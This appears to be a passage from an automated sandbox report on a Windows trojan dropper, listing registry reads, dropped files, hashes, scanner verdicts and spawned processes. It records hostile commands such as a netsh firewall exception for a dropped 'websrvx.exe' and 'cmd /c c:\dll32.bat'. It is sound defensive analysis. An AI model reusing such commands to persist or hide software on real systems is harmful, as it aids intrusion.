HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_GPC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_HTTP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPNAT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPSEC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_KSECDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MNMDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MOUNTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISTAPI\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISUIO\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDIS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDPROXY\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NETBT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NULL\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARVDM\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RASACD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RDPCDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_TCPIP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VGASAVE\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VOLSNAP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_WANARP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMACM  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMDRV  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMMCI  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVCD  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVID  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_L2TPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  DeviceDesc  WAN Miniport (IP) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0008 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPPOEMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPTPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0001  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PTIMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDPDR\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_KBD\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_MOU\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0001  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0002  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​STORAGE\​VOLUME\​1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800  ClassGUID  {71A27CDD-812A-11D0-BEC7-08002BE2092F} 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​PlugPlay  PlugPlayServiceType 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Root\​LEGACY_RASMAN\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Root\​LEGACY_RPCSS\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Root\​LEGACY_TAPISRV\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Count 
HKLM\​System\​CurrentControlSet\​Services\​PlugPlay  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ImagePath  %SystemRoot%\​system32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RpcSs  ObjectName  NT Authority\​NetworkService 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ImagePath  %SystemRoot%\​System32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ObjectName  LocalSystem 

5.b) services.exe - File Activities

  - Files Read:  
C:\ntsvcs, Flags: Named pipe

  - Files Modified:  
C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipe
C:\WINDOWS\system32\config\SysEvent.Evt
C:\ntsvcs, Flags: Named pipe

  - File System Control Communication:  
File Control Code Times
C:\net\NtControlPipe4, Flags: Named pipe  0x0011C017 
C:\ntsvcs, Flags: Named pipe  0x0011001C 

6. jopaxx_1211198010.exe

  - General information about this executable  
Analysis Reason: Started by ld02.exe 
Filename: jopaxx_1211198010.exe 
MD5: 9c9d22b9299b594597ea304f8a79066c 
SHA-1: 40aa4097589d51d5aefca2624ad3b816987c4a4e 
File Size: 9728 Bytes
Command Line: C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198010.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​iphlpapi.dll  0x76D60000  0x00019000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Win32.SuspectCrc (Sig-Id:26535175)

6.a) jopaxx_1211198010.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ServiceCurrent   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

6.b) jopaxx_1211198010.exe - File Activities

  - Files Created:  
C:\Program Files\websrvx
C:\Program Files\websrvx\websrvx.exe

  - Files Modified:  
C:\Program Files\websrvx\websrvx.exe

  - Directories Created:  
C:\Program Files\websrvx

  - Memory Mapped Files:  
File Name
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\netsh.exe
C:\Windows\AppPatch\sysmain.sdb

6.c) jopaxx_1211198010.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\system32\netsh.exe   
  netsh add allowedprogram "C:\Program Files\websrvx\websrvx.exe" websrvx ENABLE 

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\netsh.exe

7. tt_1211198012.exe

  - General information about this executable  
Analysis Reason: Started by ld02.exe 
Filename: tt_1211198012.exe 
MD5: ee8d222943c128e8cedf010c0cb03d88 
SHA-1: 2e2fefee6c425014c14996adec7b9393bfe85e25 
File Size: 18432 Bytes
Command Line: C:\WINDOWS\tt_1211198012.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCRT.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​shlwapi.dll  0x77F60000  0x00076000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Trojan-Dropper (Sig-Id:26843452)

7.a) tt_1211198012.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

7.b) tt_1211198012.exe - File Activities

  - Files Created:  
c:\dll32.bat

  - Files Modified:  
c:\dll32.bat

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\cmd.exe
C:\Windows\AppPatch\sysmain.sdb
c:\dll32.bat

7.c) tt_1211198012.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\system32\cmd.exe   

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe

8. cmd.exe

  - General information about this executable  
Analysis Reason: Started by tt_1211198012.exe 
Filename: cmd.exe 
MD5: 6d778e0f95447e6546553eeea709d03c 
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1 
File Size: 389120 Bytes
Command Line: cmd /c c:\dll32.bat 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 

8.a) cmd.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​Command Processor  AutoRun   
HKLM\​Software\​Microsoft\​Command Processor  CompletionChar  64 
HKLM\​Software\​Microsoft\​Command Processor  DefaultColor 
HKLM\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKLM\​Software\​Microsoft\​Command Processor  PathCompletionChar  64 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
